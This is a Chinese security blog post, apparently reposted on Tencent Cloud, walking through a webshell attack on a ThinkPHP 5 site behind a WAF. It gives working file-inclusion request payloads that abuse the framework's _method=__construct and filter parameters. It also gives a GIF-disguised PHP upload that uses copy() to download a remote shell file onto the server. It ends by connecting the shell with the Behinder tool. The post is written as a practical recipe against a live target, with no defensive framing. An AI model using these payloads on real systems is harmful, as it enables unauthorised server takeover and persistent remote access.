专栏首页Ms08067安全实验室【奇思淫技】TP5最新getshell漏洞

【奇思淫技】TP5最新getshell漏洞

ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

0X00 基本环境

确定目标存在tp5的漏洞,经过后期的探测发现安装有宝塔WAF。

基本环境为:php7 + 宝塔waf

因为php7之后基本确定舍弃了函数assert(),因此有关于assert的所有payload全部失效!!! 虽然网上有很多关于tp5+php7的文章,但是我尝试之后全部失败。

0x01 另辟蹊径

因为之前payload所显示的phpinfo不全,那我们换一种方式!

得出关键信息:

disable_functions:

passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru

得出关键信息:

网站绝对路径:/www/wwwroot/site

过程不多说!老规矩!

文件包含,payload: _method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/www/wwwroot/site/public/robots.txt

正好找到了该站的编辑器。(ueditor默认路径) 那么我们现在只需要构造包含内容即可。

GIF98a
<?php phpinfo(); ?>
<?php copy("http://url/shell.txt","test.php");?>

添加phpinfo是为了看代码是否正确的执行了,但如果你有自信认为一定成功,那随意。

上传图片,得到路径。

继续。

payload:

_method=__construct&filter[]=think\__include_file&get[]=/www/wwwroot/site/public/upload/20190322/c627cb130d82cb2f9c5bf4575850cf79.jpg&method=get&server[]=

注意:路径一定要正确!!!

冰蝎连接shell。

收工。

作者:曲云杰

来源:Ms08067安全实验室

本文分享自微信公众号 - Ms08067安全实验室(Ms08067_com),作者:徐哥

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2019-1388: Windows UAC 提权

    该漏洞位于Windows的UAC(User Account Control,用户帐户控制)机制中

    徐焱
  • APT报告探索心得--渗透角度

    看着大家都在写关于apt攻击的东西,今天我们就从无数的攻击中去看看大家是怎么发现问题的呢?

    徐焱
  • 少侠慢走,收下这些神兵利器!

    根据行业评论、反馈和经验,整理了最佳网络安全工具,告诉你有关用于网络安全目的的软件,包括端口扫描程序、Web 漏洞扫描程序、密码破解程序、取证工具、流量分析和社...

    徐焱
  • TP5最新getshell漏洞

    ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简...

    周俊辉
  • Markdown编辑器入门

    欢迎使用博客园的Markdown编辑器 ? 前言 今天早上起来在Ubuntu下操作,所以不能使用Windows Live Writer。所以就直接使用博客园...

    八哥
  • vb.net 从FTP读取目录下文件名列表

    Dim saveFile As String = "g:\namelist.txt" If File.Exists(saveFile) Then File....

    巴西_prince
  • 【深度】专知主题链路知识推荐#8-机器学习中的变分推断方法(Variational Inference)简介01

    【导读】主题链路知识是我们专知的核心功能之一,为用户提供AI领域系统性的知识学习服务,一站式学习人工智能的知识,包含人工智能( 机器学习、自然语言处理、计算机视...

    WZEARW
  • Ajax跨域访问代理类,支持GET和POST方法

    支持GET和POST两种方式 使用方法:http://localhost:4817/AppContainer/HttpProxy.ashx?httpproxy_...

    用户3135539
  • 《Linux命令行与shell脚本编程大全》第十章 使用编辑器

    主要介绍vim, nano, emacs,KWrite,Kate,GNOME 10.1 vim Unix系统最初的编辑器 10.1.1检查vim软件包 先搞明白...

    xcywt
  • VB.NET 纯代码生成code39条形码

    ode39是条形码的一种,也被称为3 of 9 code、USD-3或者LOGMARS,由于编制简单、能够对任意长度的数据进行编码、支持设备广泛等特性而被广泛采...

    巴西_prince

扫码关注云+社区

领取腾讯云代金券